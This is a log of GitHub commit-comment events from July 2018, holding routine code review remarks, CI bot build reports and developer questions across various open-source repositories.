{"id":"7947972216","type":"CommitCommentEvent","actor":{"login":"timogruetter"},"repo":{"name":"spring-projects/sts4"},"payload":{"comment":{"id":29666486,"position":null,"line":null,"path":null,"commit_id":"2342dc8d3bfb974291883d9ed6a7a1be369b1567","created_at":"2018-07-11T06:12:28Z","updated_at":"2018-07-11T06:12:28Z","author_association":"NONE","body":"Will this fix be adopted to the STS 3.9.5 as well? At the moment I can the similar problem that I cannot install AnyEdit Tools there...\r\n"}},"created_at":"2018-07-11T06:12:28Z"}
{"id":"7947974813","type":"CommitCommentEvent","actor":{"login":"dtbleach"},"repo":{"name":"dtbleach/Differ"},"payload":{"comment":{"id":29666490,"position":5,"line":17,"path":"Differ1.cs","commit_id":"e3ba8154dcee8537c1d475f15de725f1bd811406","created_at":"2018-07-11T06:13:14Z","updated_at":"2018-07-11T06:13:14Z","author_association":"OWNER","body":"what？"}},"created_at":"2018-07-11T06:13:14Z"}
{"id":"7947975890","type":"CommitCommentEvent","actor":{"login":"dtbleach"},"repo":{"name":"dtbleach/Differ"},"payload":{"comment":{"id":29666491,"position":5,"line":17,"path":"Differ1.cs","commit_id":"e3ba8154dcee8537c1d475f15de725f1bd811406","created_at":"2018-07-11T06:13:30Z","updated_at":"2018-07-11T06:13:30Z","author_association":"OWNER","body":"ok\r\n"}},"created_at":"2018-07-11T06:13:30Z"}
{"id":"7947976825","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29666492,"position":null,"line":null,"path":null,"commit_id":"8bf8dbe9c3e2b13dc4c9ee5a07612d672b5c8fc7","created_at":"2018-07-11T06:13:45Z","updated_at":"2018-07-11T06:13:45Z","author_association":"NONE","body":"issue_6802 (mbadams5) - i386-Windows-7-VisualStudio-14: OK (2933 of 2933 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8bf8dbe9c3e2b13dc4c9ee5a07612d672b5c8fc7-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8bf8dbe9c3e2b13dc4c9ee5a07612d672b5c8fc7-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-11T06:13:45Z"}
{"id":"7947978750","type":"CommitCommentEvent","actor":{"login":"Swapnil-ingle"},"repo":{"name":"krishna-waidande/ImportParticipantCsv_plugin"},"payload":{"comment":{"id":29666494,"position":39,"line":39,"path":"src/main/java/com/krishagni/importcsv/core/ParticipantCsvImporter.java","commit_id":"1f4e4a0208a331d19aef0ce101548cac2c6e7152","created_at":"2018-07-11T06:14:24Z","updated_at":"2018-07-11T06:14:24Z","author_association":"NONE","body":"Change the method name to isHeaderRowValid() as it's would be more readable as the csv will have one header row."}},"created_at":"2018-07-11T06:14:24Z"}
{"id":"7947982328","type":"CommitCommentEvent","actor":{"login":"fuzhouxxdong"},"repo":{"name":"fanmf/demo"},"payload":{"comment":{"id":29666503,"position":null,"line":null,"path":null,"commit_id":"7b52532ebdf4d2dc26ca164cc058711d33fe74d0","created_at":"2018-07-11T06:15:33Z","updated_at":"2018-07-11T06:15:33Z","author_association":"NONE","body":"这么屌吗\r\n"}},"created_at":"2018-07-11T06:15:33Z"}
{"id":"7947988492","type":"CommitCommentEvent","actor":{"login":"pavlovskiypavel89"},"repo":{"name":"pavlovskiypavel89/JSGame"},"payload":{"comment":{"id":29666508,"position":null,"line":null,"path":null,"commit_id":"691106cb043401a685ac60651d4b0a149b8bbd6f","created_at":"2018-07-11T06:17:31Z","updated_at":"2018-07-11T06:17:31Z","author_association":"OWNER","body":"Для такого варианта записи промисов мне наверное было нужно использовать такой вариант записи:\r\nloadLevels()\r\n  .then(schemasCode => JSON.parse(schemasCode))\r\n  .then(runGame)\r\n  .then(() => alert(`Âû ïðîøëè èãðó!`));"}},"created_at":"2018-07-11T06:17:31Z"}
{"id":"7947990267","type":"CommitCommentEvent","actor":{"login":"paed01"},"repo":{"name":"pierreprevoteau/bpmn-engine"},"payload":{"comment":{"id":29666511,"position":null,"line":null,"path":null,"commit_id":"4e4aa4ccda1d14e2f8b387c15a27028cad8e8d2e","created_at":"2018-07-11T06:18:06Z","updated_at":"2018-07-11T06:18:06Z","author_association":"NONE","body":"The problem is that you don't know the type of input. If it is a string you can't assign a property. It won't stick.\r\n```js\r\nconst input = 's';\r\ninput.currentTaskId = '123';\r\nconsole.log(input, input.currentTaskId); // s undefined\r\n```\r\n\r\nHave you tried addressing `this.id` in your service function?"}},"created_at":"2018-07-11T06:18:06Z"}
{"id":"7947992668","type":"CommitCommentEvent","actor":{"login":"Swapnil-ingle"},"repo":{"name":"krishna-waidande/ImportParticipantCsv_plugin"},"payload":{"comment":{"id":29666517,"position":47,"line":47,"path":"src/main/java/com/krishagni/importcsv/core/ParticipantCsvImporter.java","commit_id":"1f4e4a0208a331d19aef0ce101548cac2c6e7152","created_at":"2018-07-11T06:18:51Z","updated_at":"2018-07-11T06:18:51Z","author_association":"NONE","body":"No need to ose.addError in case the CSV header row is invalid, instead should throw the exception and halt the normal process flow."}},"created_at":"2018-07-11T06:18:51Z"}
{"id":"7947993251","type":"CommitCommentEvent","actor":{"login":"AntonyVorontsov"},"repo":{"name":"dmstreltcov/antosha"},"payload":{"comment":{"id":29666520,"position":27,"line":27,"path":"app/src/main/java/com/example/alexander/antosha/MainActivity.java","commit_id":"1f735b81c5dcbe410596d07577269e22b04e87b4","created_at":"2018-07-11T06:19:03Z","updated_at":"2018-07-11T06:19:03Z","author_association":"NONE","body":"Почитай про camel case, там нету подчёркиваний вообще.\r\nЭто в копилку code style'а"}},"created_at":"2018-07-11T06:19:03Z"}
{"id":"7947994750","type":"CommitCommentEvent","actor":{"login":"jmontoyaa"},"repo":{"name":"chamilo/chamilo-lms"},"payload":{"comment":{"id":29666521,"position":null,"line":null,"path":null,"commit_id":"10de63aa8bd52eb01f22722f31697eeaeb9cea39","created_at":"2018-07-11T06:19:30Z","updated_at":"2018-07-11T06:19:30Z","author_association":"MEMBER","body":"No, The index \"idx_personal_agenda_user\", \"id\", \"idx_personal_agenda_parent\" were blocking the drop primary index."}},"created_at":"2018-07-11T06:19:30Z"}
{"id":"7947994932","type":"CommitCommentEvent","actor":{"login":"Elakkia-Manickam"},"repo":{"name":"Elakkia-Manickam/Git-Fundamentals"},"payload":{"comment":{"id":29666522,"position":null,"line":null,"path":null,"commit_id":"97bc10295548d956167a60fd7e03c0bacb2561af","created_at":"2018-07-11T06:19:33Z","updated_at":"2018-07-11T06:19:33Z","author_association":"OWNER","body":"testing2"}},"created_at":"2018-07-11T06:19:33Z"}
{"id":"7947998815","type":"CommitCommentEvent","actor":{"login":"lucascaton"},"repo":{"name":"lucascaton/dotfiles"},"payload":{"comment":{"id":29666526,"position":4,"line":121,"path":"files/zshrc","commit_id":"e80a90ad799fbda885e78f1692723f5fe9059b71","created_at":"2018-07-11T06:20:46Z","updated_at":"2018-07-11T06:20:46Z","author_association":"OWNER","body":"@duderamos, thanks mate: https://github.com/lucascaton/dotfiles/commit/64c7b27dbc2ea736869c39f5a19b7a847a366114"}},"created_at":"2018-07-11T06:20:46Z"}
{"id":"7948002785","type":"CommitCommentEvent","actor":{"login":"AntonyVorontsov"},"repo":{"name":"dmstreltcov/antosha"},"payload":{"comment":{"id":29666532,"position":31,"line":36,"path":"app/src/main/java/com/example/alexander/antosha/DataBaseHelper.java","commit_id":"1f735b81c5dcbe410596d07577269e22b04e87b4","created_at":"2018-07-11T06:22:00Z","updated_at":"2018-07-11T06:22:00Z","author_association":"NONE","body":"Все константные строки я бы захардкодил в одном месте, например, AppConstants."}},"created_at":"2018-07-11T06:22:00Z"}
{"id":"7948004558","type":"CommitCommentEvent","actor":{"login":"nekisse-lee"},"repo":{"name":"10duck/coduck-project"},"payload":{"comment":{"id":29666535,"position":null,"line":null,"path":null,"commit_id":"c83c46e831d6590cfbf9df2125c8f1f60d51ffa2","created_at":"2018-07-11T06:22:33Z","updated_at":"2018-07-11T06:22:33Z","author_association":"CONTRIBUTOR","body":"???"}},"created_at":"2018-07-11T06:22:33Z"}
{"id":"7948027607","type":"CommitCommentEvent","actor":{"login":"Swapnil-ingle"},"repo":{"name":"krishna-waidande/ImportParticipantCsv_plugin"},"payload":{"comment":{"id":29666586,"position":47,"line":47,"path":"src/main/java/com/krishagni/importcsv/core/ParticipantCsvImporter.java","commit_id":"1f4e4a0208a331d19aef0ce101548cac2c6e7152","created_at":"2018-07-11T06:29:25Z","updated_at":"2018-07-11T06:29:25Z","author_association":"NONE","body":"Need to discuss with VP if we should ose.addError incase the csv header row itself is invalid, or should it be approached with a try-catch block."}},"created_at":"2018-07-11T06:29:25Z"}
{"id":"7948027882","type":"CommitCommentEvent","actor":{"login":"kinoafisharu"},"repo":{"name":"zaytseveugene/orpro"},"payload":{"comment":{"id":29666587,"position":5,"line":219,"path":"pages/models.py","commit_id":"a6bbc483b5ab575ede33be8ddb0008280d1f2947","created_at":"2018-07-11T06:29:30Z","updated_at":"2018-07-11T06:29:30Z","author_association":"NONE","body":"Каково назначение значения \"пробел\" для цены? Даже цена = 0 - нонсенс, товар не может не иметь цены, а тем более \"пробел\"..."}},"created_at":"2018-07-11T06:29:30Z"}
{"id":"7948028071","type":"CommitCommentEvent","actor":{"login":"saifyaar"},"repo":{"name":"saifyaar/hello-world"},"payload":{"comment":{"id":29666589,"position":2,"line":2,"path":"README.md","commit_id":"5e63c82dff508f1fed725cb8fe0860389f7bc25e","created_at":"2018-07-11T06:29:33Z","updated_at":"2018-07-11T06:29:33Z","author_association":"OWNER","body":"description"}},"created_at":"2018-07-11T06:29:33Z"}
{"id":"7948029232","type":"CommitCommentEvent","actor":{"login":"jammmet"},"repo":{"name":"openwrt/packages"},"payload":{"comment":{"id":29666593,"position":null,"line":null,"path":null,"commit_id":"f6e06384f1c5aca396ec65a70ec94837f1c133a8","created_at":"2018-07-11T06:29:52Z","updated_at":"2018-07-11T06:29:52Z","author_association":"NONE","body":"I get an error loading `mysqlnd.so` (I am using `mysql`, not `mariadb`):\r\n\r\n`[11-Jul-2018 08:24:40] NOTICE: PHP message: PHP Warning:  PHP Startup: Unable to load dynamic library 'mysqlnd.so' (tried: /usr/lib/php/mysqlnd.so (Error relocating /usr/lib/php/mysqlnd.so: RSA_size: symbol not found), /usr/lib/php/mysqlnd.so.so (Error loading shared library /usr/lib/php/mysqlnd.so.so: No such file or directory)) in Unknown on line 0\r\n[11-Jul-2018 08:24:40] NOTICE: PHP message: PHP Warning:  PHP Startup: Unable to load dynamic library 'pdo_mysql.so' (tried: /usr/lib/php/pdo_mysql.so (Error relocating /usr/lib/php/pdo_mysql.so: mysqlnd_reverse_api_register_api: symbol not found), /usr/lib/php/pdo_mysql.so.so (Error loading shared library /usr/lib/php/pdo_mysql.so.so: No such file or directory)) in Unknown on line 0`"}},"created_at":"2018-07-11T06:29:52Z"}
{"id":"7948030468","type":"CommitCommentEvent","actor":{"login":"aryanaqq"},"repo":{"name":"aryanaqq/GitHub"},"payload":{"comment":{"id":29666599,"position":null,"line":null,"path":null,"commit_id":"2bd3b8d258d38e367d022d2a8afdb9145b6c61ff","created_at":"2018-07-11T06:30:13Z","updated_at":"2018-07-11T06:30:13Z","author_association":"OWNER","body":"A"}},"created_at":"2018-07-11T06:30:13Z"}
{"id":"7948030578","type":"CommitCommentEvent","actor":{"login":"iSazonov"},"repo":{"name":"PowerShell/PowerShell"},"payload":{"comment":{"id":29666600,"position":80,"line":89,"path":"src/Microsoft.PowerShell.Commands.Utility/commands/utility/ConvertFromMarkdownCommand.cs","commit_id":"7492db9c26164232de25303a16498672e0a712f3","created_at":"2018-07-11T06:30:15Z","updated_at":"2018-07-11T06:30:15Z","author_association":"COLLABORATOR","body":"Please remove the unneeded comment."}},"created_at":"2018-07-11T06:30:15Z"}
{"id":"7948036578","type":"CommitCommentEvent","actor":{"login":"iSazonov"},"repo":{"name":"PowerShell/PowerShell"},"payload":{"comment":{"id":29666608,"position":179,"line":247,"path":"src/Microsoft.PowerShell.Commands.Utility/commands/utility/MarkdownOptionCommands.cs","commit_id":"7492db9c26164232de25303a16498672e0a712f3","created_at":"2018-07-11T06:31:58Z","updated_at":"2018-07-11T06:31:58Z","author_association":"COLLABORATOR","body":"endproessing -> EndProcessing"}},"created_at":"2018-07-11T06:31:58Z"}
{"id":"7948038167","type":"CommitCommentEvent","actor":{"login":"speedy-1702"},"repo":{"name":"cgeo/cgeo"},"payload":{"comment":{"id":29666615,"position":null,"line":null,"path":null,"commit_id":"d48b4a67639202e6fdc8599740ad68619034a2b4","created_at":"2018-07-11T06:32:26Z","updated_at":"2018-07-11T06:32:26Z","author_association":"NONE","body":"what is the correct dir structure to store additional spoiler pictures (e.g. from checker)?\r\n\r\nis it like \\GeocachePhotos\\M\\4\\GC51Z4M\\spoiler.jpg\r\nor like /sdcard/cgeo/spoilers/Z/Y/GC123XYZ/\r\n\r\nBoth don't work. Android version is 8.0 (oreo)"}},"created_at":"2018-07-11T06:32:26Z"}
{"id":"7948038305","type":"CommitCommentEvent","actor":{"login":"kinoafisharu"},"repo":{"name":"zaytseveugene/orpro"},"payload":{"comment":{"id":29666616,"position":20,"line":415,"path":"pages/models.py","commit_id":"a6bbc483b5ab575ede33be8ddb0008280d1f2947","created_at":"2018-07-11T06:32:28Z","updated_at":"2018-07-11T06:32:28Z","author_association":"NONE","body":"Каковы значения поля \"тип цены\" предполагаются? Какой тип по умолчанию? Розничная? СтОит ее прописать значением по умолчанию?"}},"created_at":"2018-07-11T06:32:28Z"}
{"id":"7948039478","type":"CommitCommentEvent","actor":{"login":"Swapnil-ingle"},"repo":{"name":"krishna-waidande/ImportParticipantCsv_plugin"},"payload":{"comment":{"id":29666618,"position":75,"line":69,"path":"src/main/java/com/krishagni/importcsv/core/ParticipantCsvImporter.java","commit_id":"1f4e4a0208a331d19aef0ce101548cac2c6e7152","created_at":"2018-07-11T06:32:49Z","updated_at":"2018-07-11T06:32:49Z","author_association":"NONE","body":"#1 Redundantly sending record object.\r\n#2 Change 'value' to an appropriate name such as CPID."}},"created_at":"2018-07-11T06:32:49Z"}
{"id":"7948045018","type":"CommitCommentEvent","actor":{"login":"kinoafisharu"},"repo":{"name":"zaytseveugene/orpro"},"payload":{"comment":{"id":29666628,"position":4,"line":9,"path":"pages/urls.py","commit_id":"a6bbc483b5ab575ede33be8ddb0008280d1f2947","created_at":"2018-07-11T06:34:27Z","updated_at":"2018-07-11T06:34:27Z","author_association":"NONE","body":"прошу добавить коммент, поясняющий назначение этой строки"}},"created_at":"2018-07-11T06:34:27Z"}
{"id":"7948045881","type":"CommitCommentEvent","actor":{"login":"RolandPheasant"},"repo":{"name":"RolandPheasant/DynamicData"},"payload":{"comment":{"id":29666630,"position":25,"line":3874,"path":"DynamicData/Cache/ObservableCacheEx.cs","commit_id":"4f0455317b0ae6baf9defe02c44d48c6ed06b4b1","created_at":"2018-07-11T06:34:43Z","updated_at":"2018-07-11T06:34:43Z","author_association":"OWNER","body":"Observable.Return completes which will have the effect of completing the stream.\r\n\r\nThere are several ways around this including using Observable.Create and firing an onnext\r\n\r\n"}},"created_at":"2018-07-11T06:34:43Z"}
{"id":"7948046571","type":"CommitCommentEvent","actor":{"login":"lbudai"},"repo":{"name":"balabit/syslog-ng"},"payload":{"comment":{"id":29666633,"position":null,"line":null,"path":null,"commit_id":"3decab0c4d473a256b4ee26df6e566801e2a4906","created_at":"2018-07-11T06:34:54Z","updated_at":"2018-07-11T06:34:54Z","author_association":"CONTRIBUTOR","body":"just a question: is it possible to use `cr_expect` instead of `cr_assert`?"}},"created_at":"2018-07-11T06:34:54Z"}
{"id":"7948046603","type":"CommitCommentEvent","actor":{"login":"tuzfanfan"},"repo":{"name":"tuzfanfan/rPUBG-pythonPUBG"},"payload":{"comment":{"id":29666634,"position":null,"line":null,"path":null,"commit_id":"61dd913cc15af404f2e6d91f9693e602ce59702d","created_at":"2018-07-11T06:34:55Z","updated_at":"2018-07-11T06:34:55Z","author_association":"OWNER","body":"Scrapy"}},"created_at":"2018-07-11T06:34:55Z"}
{"id":"7948051947","type":"CommitCommentEvent","actor":{"login":"dpgeorge"},"repo":{"name":"mitchins/micropython"},"payload":{"comment":{"id":29666636,"position":124,"line":360,"path":"ports/esp32/modnetwork.c","commit_id":"dd5ccce0f6856d3136a936e09b34e216d1a15ea3","created_at":"2018-07-11T06:36:29Z","updated_at":"2018-07-11T06:36:29Z","author_association":"NONE","body":"I think what it would be good to do here is just return `wifi_sta_disconn_reason` directly (well, convert it using `MP_OBJ_NEW_SMALL_INT()`).  That gives the user access to all the error codes, even if they don't have a string associated with them in the `network` module.\r\n\r\nTo accommodate this, the other identifiers like `STATION_GOT_IP` and `STATION_CONNECTING` should have numbers that don't conflict with any error reasons.  These other ones could start at 0x1000, for example."}},"created_at":"2018-07-11T06:36:29Z"}
{"id":"7948053300","type":"CommitCommentEvent","actor":{"login":"danielpeintner"},"repo":{"name":"EXIficient/exificient"},"payload":{"comment":{"id":29666640,"position":34,"line":300,"path":"src/test/java/com/siemens/ct/exi/main/api/stream/StAXCoderTestCase.java","commit_id":"59b9aa37d0fbdfc9f08bbb149da3c36e11373557","created_at":"2018-07-11T06:36:52Z","updated_at":"2018-07-11T06:36:52Z","author_association":"CONTRIBUTOR","body":"To be honest I am still not sure. According to my reading you are saying there are calls one needs to report all possible NS declaration (including the father elements) and other calls that just need to report the ones declared in the element context.\r\n\r\nCan you point me which call is for which?"}},"created_at":"2018-07-11T06:36:52Z"}
{"id":"7948053488","type":"CommitCommentEvent","actor":{"login":"micmac1"},"repo":{"name":"openwrt/packages"},"payload":{"comment":{"id":29666641,"position":null,"line":null,"path":null,"commit_id":"f6e06384f1c5aca396ec65a70ec94837f1c133a8","created_at":"2018-07-11T06:36:56Z","updated_at":"2018-07-11T06:36:56Z","author_association":"CONTRIBUTOR","body":"Maybe the openssl version that was used to compile php7 against is too different to the version on your device?\n"}},"created_at":"2018-07-11T06:36:56Z"}
{"id":"7948053529","type":"CommitCommentEvent","actor":{"login":"RolandPheasant"},"repo":{"name":"RolandPheasant/DynamicData"},"payload":{"comment":{"id":29666642,"position":25,"line":3874,"path":"DynamicData/Cache/ObservableCacheEx.cs","commit_id":"4f0455317b0ae6baf9defe02c44d48c6ed06b4b1","created_at":"2018-07-11T06:36:56Z","updated_at":"2018-07-11T06:36:56Z","author_association":"OWNER","body":"Actually being as it is wrapped inside a defer this statement may not be true. Would you mind adding a test to check that it does not prematurely complete"}},"created_at":"2018-07-11T06:36:56Z"}
{"id":"7948054070","type":"CommitCommentEvent","actor":{"login":"wouterbeek"},"repo":{"name":"bbatsov/projectile"},"payload":{"comment":{"id":29666647,"position":null,"line":null,"path":null,"commit_id":"0cff66522337fc0b57dd26e4b6db2b57874a0537","created_at":"2018-07-11T06:37:06Z","updated_at":"2018-07-11T06:37:06Z","author_association":"NONE","body":"This will break most Projectile users' setup, since almost all Internet resources/tutorials that explain how to use Projectile say that you should use `projectile-global-mode`."}},"created_at":"2018-07-11T06:37:06Z"}
{"id":"7948054732","type":"CommitCommentEvent","actor":{"login":"danielpeintner"},"repo":{"name":"EXIficient/exificient"},"payload":{"comment":{"id":29666652,"position":21,"line":435,"path":"src/main/java/com/siemens/ct/exi/main/api/stream/StAXDecoder.java","commit_id":"59b9aa37d0fbdfc9f08bbb149da3c36e11373557","created_at":"2018-07-11T06:37:16Z","updated_at":"2018-07-11T06:37:16Z","author_association":"CONTRIBUTOR","body":"According to my understanding for both elements <message> and <type> the namespaceCount for StartElement and EndElement should be 1.\r\n\r\n> The namespace declarations for type should be a list that includes 'a' and 'b' because those are the namespace prefixes that apply to the type element.\r\n\r\nDo you mean the \"getNamespaceContext()\" call?\r\nAre you sure that both NS declaratiions are needed. I am not sure whether I can agree on that. \r\n\r\nAccording to my understanding the namespaces are handled based on the current element NOT taking into account the father. At least I don't see any mentioning on that https://docs.oracle.com/javase/7/docs/api/javax/xml/stream/XMLStreamReader.html#getNamespaceContext()\r\n"}},"created_at":"2018-07-11T06:37:16Z"}
{"id":"7948055225","type":"CommitCommentEvent","actor":{"login":"danielpeintner"},"repo":{"name":"EXIficient/exificient"},"payload":{"comment":{"id":29666653,"position":49,"line":465,"path":"src/main/java/com/siemens/ct/exi/main/api/stream/StAXDecoder.java","commit_id":"59b9aa37d0fbdfc9f08bbb149da3c36e11373557","created_at":"2018-07-11T06:37:25Z","updated_at":"2018-07-11T06:37:25Z","author_association":"CONTRIBUTOR","body":"I would be OK with throwing an error even if according there is a different XML event even though I think this is not an issue. \r\n\r\nYes, the current implementation reports only the NS declaration of a certain element (declared in this element context) without taking into account the fathers etc"}},"created_at":"2018-07-11T06:37:25Z"}
{"id":"7948055486","type":"CommitCommentEvent","actor":{"login":"dpgeorge"},"repo":{"name":"mitchins/micropython"},"payload":{"comment":{"id":29666654,"position":163,"line":711,"path":"ports/esp32/modnetwork.c","commit_id":"dd5ccce0f6856d3136a936e09b34e216d1a15ea3","created_at":"2018-07-11T06:37:29Z","updated_at":"2018-07-11T06:37:29Z","author_association":"NONE","body":"This could link directly to `WIFI_REASON_NO_AP_FOUND` like this:\r\n```c\r\n{ MP_ROM_QSTR(MP_QSTR_STAT_NO_AP_FOUND), MP_ROM_INT(WIFI_REASON_NO_AP_FOUND)},\r\n```"}},"created_at":"2018-07-11T06:37:29Z"}
{"id":"7948057051","type":"CommitCommentEvent","actor":{"login":"danielpeintner"},"repo":{"name":"EXIficient/exificient"},"payload":{"comment":{"id":29666658,"position":59,"line":477,"path":"src/main/java/com/siemens/ct/exi/main/api/stream/StAXDecoder.java","commit_id":"59b9aa37d0fbdfc9f08bbb149da3c36e11373557","created_at":"2018-07-11T06:37:55Z","updated_at":"2018-07-11T06:37:55Z","author_association":"CONTRIBUTOR","body":"Thanks. This is a good hint!"}},"created_at":"2018-07-11T06:37:55Z"}
{"id":"7948059303","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29666669,"position":null,"line":null,"path":null,"commit_id":"37913573ae69c780c5af1228b7df40b31ecf18da","created_at":"2018-07-11T06:38:30Z","updated_at":"2018-07-11T06:38:30Z","author_association":"NONE","body":"[Your benchmark job](https://github.com/JuliaLang/julia/commit/37913573ae69c780c5af1228b7df40b31ecf18da#commitcomment-29665811) has completed - possible performance regressions were detected. A full report can be found [here](https://github.com/JuliaCI/BaseBenchmarkReports/blob/480aa30c52d08cefc7fcb9bdd9d861cf6daba731/daily_2018_7_11/report.md). cc @ararslan"}},"created_at":"2018-07-11T06:38:30Z"}
{"id":"7948066381","type":"CommitCommentEvent","actor":{"login":"softwebtuts"},"repo":{"name":"ytsdk/ytsdk"},"payload":{"comment":{"id":29666684,"position":null,"line":null,"path":null,"commit_id":"4a32bfdab44794c5deb43b799481ecb9d868fff9","created_at":"2018-07-11T06:40:25Z","updated_at":"2018-07-11T06:40:25Z","author_association":"NONE","body":"Nice Git..\r\nhttps://softwebtuts.blogspot.com"}},"created_at":"2018-07-11T06:40:25Z"}
{"id":"7948069628","type":"CommitCommentEvent","actor":{"login":"andyzhangx"},"repo":{"name":"Azure/acs-engine"},"payload":{"comment":{"id":29666696,"position":null,"line":null,"path":null,"commit_id":"2b88659988242a02c66bf296b2aa8f3a3c9bdc1c","created_at":"2018-07-11T06:41:18Z","updated_at":"2018-07-11T06:41:18Z","author_association":"CONTRIBUTOR","body":"Have we already make acs-engine use containerd by default? And we found that `https://storage.googleapis.com/cri-containerd-release/cri-containerd-${CRI_CONTAINERD_VERSION}.linux-amd64.tar.gz` could not be accessed in azure china cloud, I have already mirrrored containerd to https://mirror.azure.cn/kubernetes/containerd, would script `parts/k8s/kubernetescustomscript.sh` accept any cloud parameters, e.g. PublicCloud, ChinaCloud, etc. \r\n@jackfrancis @karataliu "}},"created_at":"2018-07-11T06:41:18Z"}
{"id":"7948074978","type":"CommitCommentEvent","actor":{"login":"kinoafisharu"},"repo":{"name":"zaytseveugene/orpro"},"payload":{"comment":{"id":29666703,"position":null,"line":null,"path":null,"commit_id":"a6bbc483b5ab575ede33be8ddb0008280d1f2947","created_at":"2018-07-11T06:42:50Z","updated_at":"2018-07-11T06:42:50Z","author_association":"NONE","body":"ОК. В целом видна работа по добавлению типов цен и правка работы с изображениями. По моим ощущениям, изменения на несколько часов работы. Хочется комментов назначения вносимых изменений и, в идеале, авторской подписи этих изменений в тех же комментах.\r\nПример: # Евг.Зайцев: добавил типы цен. По умолчанию тип цены \"розничная\". Прочие типы добавит в форме \"прайс\" редактор сайта"}},"created_at":"2018-07-11T06:42:50Z"}
{"id":"7948075137","type":"CommitCommentEvent","actor":{"login":"refeed"},"repo":{"name":"kriti21/coala-bears"},"payload":{"comment":{"id":29666705,"position":36,"line":36,"path":"bears/vcs/git/CISkipInspectBear.py","commit_id":"f21bdeefe5e236ea9d04c1ade13ea5d28c057bc6","created_at":"2018-07-11T06:42:53Z","updated_at":"2018-07-11T06:42:53Z","author_association":"NONE","body":"You can just import `COMMIT_TYPE` from `VCSCommitBear` and do `if COMMIT_TYPE.ci_skip_commit not in result.commit_type:`. String-ifying the variable isn't a good idea to do it ;) unless we're dealing with stdout"}},"created_at":"2018-07-11T06:42:53Z"}
{"id":"7948075924","type":"CommitCommentEvent","actor":{"login":"diddipoeler"},"repo":{"name":"diddipoeler/sportsmanagement"},"payload":{"comment":{"id":29666706,"position":null,"line":null,"path":null,"commit_id":"b804a2e6b99733fb4ad2a6defe8d02da805829d5","created_at":"2018-07-11T06:43:07Z","updated_at":"2018-07-11T06:43:07Z","author_association":"OWNER","body":"#698"}},"created_at":"2018-07-11T06:43:07Z"}
{"id":"7948078491","type":"CommitCommentEvent","actor":{"login":"AShalysh"},"repo":{"name":"AShalysh/ruby_tasks"},"payload":{"comment":{"id":29666710,"position":12,"line":5,"path":"lesson7/cargo_carriage.rb","commit_id":"a10f6098dc87322a19ed1f6a2e8a78fb421980c6","created_at":"2018-07-11T06:43:48Z","updated_at":"2018-07-11T06:43:48Z","author_association":"OWNER","body":"Спасибо за объяснение)"}},"created_at":"2018-07-11T06:43:48Z"}
{"id":"7948078807","type":"CommitCommentEvent","actor":{"login":"simtg"},"repo":{"name":"ros-industrial/industrial_training"},"payload":{"comment":{"id":29666712,"position":null,"line":null,"path":null,"commit_id":"36a7ea6f9492688c45dd7420cec6a5b7767d9efe","created_at":"2018-07-11T06:43:54Z","updated_at":"2018-07-11T06:43:54Z","author_association":"NONE","body":"Related to issue 156 (#156):\r\n\r\nChanges made to the .md file as part of World ROS-I Day 2018"}},"created_at":"2018-07-11T06:43:54Z"}
{"id":"7948080701","type":"CommitCommentEvent","actor":{"login":"iSazonov"},"repo":{"name":"PowerShell/PowerShell"},"payload":{"comment":{"id":29666716,"position":25,"line":70,"path":"src/Microsoft.PowerShell.MarkdownRender/ListItemBlockRenderer.cs","commit_id":"7492db9c26164232de25303a16498672e0a712f3","created_at":"2018-07-11T06:44:25Z","updated_at":"2018-07-11T06:44:25Z","author_association":"COLLABORATOR","body":"Why we _duplicate_ the code from StringUtil.cs?"}},"created_at":"2018-07-11T06:44:25Z"}
{"id":"7948081463","type":"CommitCommentEvent","actor":{"login":"cathayandy"},"repo":{"name":"cathayandy/thu_qa_homepage"},"payload":{"comment":{"id":29666717,"position":null,"line":null,"path":null,"commit_id":"837acee95d0e21771848ef64c93f86c173190d6f","created_at":"2018-07-11T06:44:38Z","updated_at":"2018-07-11T06:44:38Z","author_association":"OWNER","body":"不如tf贡献者"}},"created_at":"2018-07-11T06:44:38Z"}
{"id":"7948082180","type":"CommitCommentEvent","actor":{"login":"Swapnil-ingle"},"repo":{"name":"krishna-waidande/ImportParticipantCsv_plugin"},"payload":{"comment":{"id":29666718,"position":69,"line":63,"path":"src/main/java/com/krishagni/importcsv/core/ParticipantCsvImporter.java","commit_id":"1f4e4a0208a331d19aef0ce101548cac2c6e7152","created_at":"2018-07-11T06:44:50Z","updated_at":"2018-07-11T06:44:50Z","author_association":"NONE","body":"I think, according to Single Responsibility principle, validatedCpId() should return true/false and instead of setting the values inside the validateCpId() method use ternary operator here itself to set the value or ose.addError() incase it returns false."}},"created_at":"2018-07-11T06:44:50Z"}
{"id":"7948084547","type":"CommitCommentEvent","actor":{"login":"Swapnil-ingle"},"repo":{"name":"krishna-waidande/ImportParticipantCsv_plugin"},"payload":{"comment":{"id":29666727,"position":80,"line":74,"path":"src/main/java/com/krishagni/importcsv/core/ParticipantCsvImporter.java","commit_id":"1f4e4a0208a331d19aef0ce101548cac2c6e7152","created_at":"2018-07-11T06:45:28Z","updated_at":"2018-07-11T06:45:28Z","author_association":"NONE","body":"Spell-check the code 'Invalide' --> 'Invalid'"}},"created_at":"2018-07-11T06:45:28Z"}
{"id":"7948085962","type":"CommitCommentEvent","actor":{"login":"iSazonov"},"repo":{"name":"PowerShell/PowerShell"},"payload":{"comment":{"id":29666728,"position":28,"line":73,"path":"src/Microsoft.PowerShell.MarkdownRender/ListItemBlockRenderer.cs","commit_id":"7492db9c26164232de25303a16498672e0a712f3","created_at":"2018-07-11T06:45:50Z","updated_at":"2018-07-11T06:45:50Z","author_association":"COLLABORATOR","body":"Please use braces.\r\n```c#\r\nif (countOfSpaces >= IndentCacheMax) \r\n{\r\n    return new string(' ', countOfSpaces);\r\n}"}},"created_at":"2018-07-11T06:45:50Z"}
